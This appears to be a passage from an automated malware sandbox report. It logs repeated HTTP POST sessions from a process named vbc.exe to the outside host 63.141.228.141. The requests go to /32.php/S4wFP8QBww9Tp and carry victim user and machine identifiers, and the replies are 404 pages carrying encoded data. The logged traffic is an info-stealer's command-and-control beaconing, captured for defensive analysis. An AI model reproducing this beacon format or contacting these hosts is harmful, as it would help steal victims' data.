Jun 16, 2021 12:29:48.546235085 CEST	818	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	63.141.228.141	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2021 12:29:48.840133905 CEST	819	OUT	POST /32.php/S4wFP8QBww9Tp HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B78A3212 Content-Length: 176 Connection: close
Jun 16, 2021 12:29:49.000900030 CEST	819	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus830021ALBUS-PC+0DE4229FCF97F5879F50F8FD3HglRH
Jun 16, 2021 12:29:49.679653883 CEST	820	IN	HTTP/1.1 404 Not Found Date: Wed, 16 Jun 2021 10:29:48 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Jun 16, 2021 12:29:49.679689884 CEST	822	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Jun 16, 2021 12:29:49.679703951 CEST	823	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Jun 16, 2021 12:29:49.679722071 CEST	824	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Jun 16, 2021 12:29:49.679752111 CEST	826	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Jun 16, 2021 12:29:49.679773092 CEST	827	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Jun 16, 2021 12:29:49.679797888 CEST	828	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Jun 16, 2021 12:29:49.679816008 CEST	829	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	63.141.228.141	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2021 12:29:49.987019062 CEST	830	OUT	POST /32.php/S4wFP8QBww9Tp HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B78A3212 Content-Length: 149 Connection: close
Jun 16, 2021 12:29:50.149492025 CEST	830	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus830021ALBUS-PC0DE4229FCF97F5879F50F8FD3
Jun 16, 2021 12:29:50.833703995 CEST	832	IN	HTTP/1.1 404 Not Found Date: Wed, 16 Jun 2021 10:29:50 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Jun 16, 2021 12:29:50.833746910 CEST	833	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Jun 16, 2021 12:29:50.833812952 CEST	835	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Jun 16, 2021 12:29:50.833843946 CEST	836	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Jun 16, 2021 12:29:50.833889961 CEST	837	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Jun 16, 2021 12:29:50.833934069 CEST	839	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Jun 16, 2021 12:29:50.834017992 CEST	840	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Jun 16, 2021 12:29:50.834050894 CEST	841	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	63.141.228.141	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2021 12:29:51.153026104 CEST	842	OUT	POST /32.php/S4wFP8QBww9Tp HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B78A3212 Content-Length: 149 Connection: close
Jun 16, 2021 12:29:51.315301895 CEST	842	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus830021ALBUS-PC0DE4229FCF97F5879F50F8FD3
Jun 16, 2021 12:29:51.991955042 CEST	844	IN	HTTP/1.1 404 Not Found Date: Wed, 16 Jun 2021 10:29:51 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 